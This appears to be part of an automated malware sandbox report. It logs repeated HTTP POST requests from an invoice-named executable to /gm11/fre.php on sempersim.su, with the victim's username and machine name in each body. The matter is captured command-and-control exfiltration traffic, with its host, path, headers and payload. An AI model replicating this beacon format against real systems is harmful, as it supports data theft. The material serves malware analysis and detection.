                                Nov 30, 2022 00:55:19.700479031 CET175OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:21.118366957 CET175INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:23 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                38192.168.2.34973795.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:21.614295959 CET176OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:21.678060055 CET176OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:23.147008896 CET177INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:25 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                39192.168.2.34973895.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:23.450512886 CET177OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:23.507752895 CET178OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:24.982215881 CET178INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:27 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                4192.168.2.34970395.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:16.960834026 CET127OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:17.017842054 CET127OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:54:18.541620016 CET127INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:54:21 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                40192.168.2.34973995.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:25.267085075 CET179OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:25.324280977 CET179OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:26.908255100 CET179INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:29 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                41192.168.2.34974095.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:27.193434000 CET180OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:27.257441998 CET180OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:28.902821064 CET181INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:31 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                42192.168.2.34974195.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:29.247108936 CET182OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:29.312683105 CET182OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:30.821604013 CET182INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:33 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                43192.168.2.34974295.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:31.101063967 CET183OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:31.159028053 CET183OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:32.668199062 CET184INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:35 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                44192.168.2.34974395.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:32.962708950 CET184OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:33.026784897 CET185OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:34.122250080 CET185INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:37 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                45192.168.2.34974495.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:34.401350975 CET186OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:34.458682060 CET186OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:36.086250067 CET186INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:38 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                46192.168.2.34974595.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:36.377571106 CET187OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:36.442002058 CET187OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:37.973570108 CET188INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:40 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                47192.168.2.34974695.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:38.275173903 CET189OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:38.333534956 CET189OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:39.906968117 CET189INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:42 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                48192.168.2.34974795.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:40.214632988 CET190OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:40.271949053 CET191OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:41.771804094 CET191INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:44 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                49192.168.2.34974895.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:42.098366976 CET192OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:42.166110039 CET192OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:43.661912918 CET192INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:46 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                5192.168.2.34970495.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:18.966131926 CET128OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:19.031228065 CET128OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:54:19.714504957 CET129INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:54:23 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                50192.168.2.34974995.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:43.976237059 CET193OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:44.034007072 CET193OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:45.483573914 CET194INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:48 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                51192.168.2.34975095.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:45.758418083 CET194OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:45.815349102 CET195OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:46.963833094 CET195INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:49 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                52192.168.2.34975195.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:47.279515028 CET196OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:47.352607965 CET196OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:49.068855047 CET196INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:51 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                53192.168.2.34975295.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:49.378987074 CET197OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:49.446521044 CET198OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:50.930381060 CET198INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:53 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                54192.168.2.34975395.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:51.242717028 CET199OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:51.299818039 CET199OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:52.887247086 CET199INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:55 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


